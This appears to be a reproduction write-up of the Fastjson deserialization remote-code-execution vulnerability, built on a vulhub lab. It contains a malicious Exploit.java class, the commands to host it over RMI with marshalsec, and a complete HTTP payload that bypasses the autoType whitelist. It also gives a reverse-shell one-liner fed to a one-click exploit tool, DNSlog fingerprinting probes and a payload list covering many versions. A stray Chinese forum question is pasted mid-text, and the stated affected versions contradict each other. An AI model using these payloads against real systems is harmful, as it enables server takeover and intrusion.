0x01 Vulnerability Introduction
Fastjson is a json parser open sourced by Alibaba. It has superior performance and is widely used in Java projects of major manufacturers. Fastjson added a deserialization whitelist after version 1.2.24, but in versions before 1.2.48, attackers can use specially constructed json strings to bypass whitelist detection and successfully execute arbitrary commands.
0x02 range of influence
Fastjson < 1.2.68
The bypass method released by Fastjson can kill all versions below 1.2.68
0x03 Vulnerability Reappearance
Let's take Fastjson 1.2.47 as an example, because it is very convenient for vulhub to have a ready-made environment
P牛我用vulhub中的 1.2.47的docker 想测试doslog检查 fastjson 但是总是收到不到dnslog 但是正常的exp反弹shell就是可以我很疑惑
我的用法正确吗,用的这个{"@type":"java.net.Inet4Address","val":"bouaiq.dnslog.cn"}
The following is a schematic diagram of the process
Host A: Host with fastjson deserialization vulnerability
Host C: Serving RMI/LDAP
Host B: Constructed malicious class (including commands to be executed)
Throughout the remote command execution process
1. The hacker uses the payload to attack host A (the payload needs to specify the rmi/ldap address)
2. Host A triggers a deserialization vulnerability and sends an rmi remote distribution call to connect to host C
3. The rmi service of host C specifies to load the malicious java class of host B, so host A finally loads and executes the malicious java class of host B through the rmi service of host C
4. Host A triggers malicious system command execution
0x04 Recurrence process
Reproduce according to the above process and environment:
Host A: http://1.1.1.1:8090 (host with Fastjson vulnerability)
Host B: http://2.2.2.2:8888 (malicious java service)
Host C: rmi://2.2.2.2:9999 (remote method call service)
Actually hosts B and C are one machine with different ports)
0x041 construct malicious method
The target environment is openjdk:8u102
that there is no limitation in this version com.sun.jndi.rmi.object.trustURLCodebase
, we can simply use RMI for command execution.
First compile and upload the command execution code
Use the following payload:
Among them, touch /zydx666 is a system command, which can be modified according to your own needs
Note that the file name is Exploit.java and the fixed format cannot be changed
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{
"bash", "-c", "touch /zydx666"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
Use the javac command on host B to compile the Exploit.java file and generate an Exploit.class file
javac Exploit.java
Then start an http service on host B, the middleware is optional, but you need to be able to access the Exploit.class file, here use python3 to temporarily start a
python3 -m http.server --bind 0.0.0.0 8888
0x042 Enable the remote method call rmi service
Next, start the rmi service on host C
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://1.1.1.1:8888/#Exploit" 9999
marshalsec-0.0.3-SNAPSHOT-all.jar
Reference https://github.com/mbechler/marshalsec
So far the services are all ready
0x043 send payload
Next , send the fastjson deserialization vulnerability payload to host A (a vulnerable machine)
POST / HTTP/1.1
Host: 1.1.1.1:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 260
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://2.2.2.2:9999/Exploit",
"autoCommit":true
}
}
At this time, host A receives the POST request, triggers the deserialization vulnerability, and finally executes the content in the Exploit.class file
I am using the reverse shell command
Rebound shell succeeds:
0x05 simplified attack tool
A simplified version of the tool is provided below
It is written by the master of https://github.com/wyzxxz/fastjson_rce_tool, one-click service and jar package that generates the entire rmi+class file of malicious code
Step 1: You only need to start it on your own server
java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/80 0>&1"
Step 2: Send payload
Successfully rebound the shell
0x06 vulnerability detection
Whether the unknown target uses Fastjson, but the site has the original error echo
If the site has the original error report echo, you can use unclosed curly braces to report the error echo, and there will often be fastjson in the error report
For example
No echo, blindly distinguish between Fastjson and Jackson through DNS echo
I use the following payload test
{"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}
Finally received dnslog
The latest version 1.2.67 can still judge whether the backend uses fastjson through dnslog
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
Malformation
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
POC:
To be nested inside zeo
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{
{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{
{"@type":"java.net.URL","val":"dnslog"}:0
0x07 Multi-version payload collection
Affected version:
fastjson<=1.2.24
exp:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}
Affected version:
fastjson<=1.2.41
Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)
exp:
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}
Affected version:
fastjson<=1.2.42
Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)
exp:
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
Affected version:
fastjson<=1.2.43
Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)
exp:
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}
Affected version:
fastjson<=1.2.45
Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)
exp:
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}
Affected version:
fastjson<=1.2.47
exp:
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://x.x.x.x:1999/Exploit",
"autoCommit": true
}
}
Affected version:
fastjson<=1.2.62
exp:
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"
Affected version:
fastjson<=1.2.66
Prerequisite:
The autoTypeSupport property can only be used if it is true. (fastjson>=1.2.25 defaults to false)
exp:
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}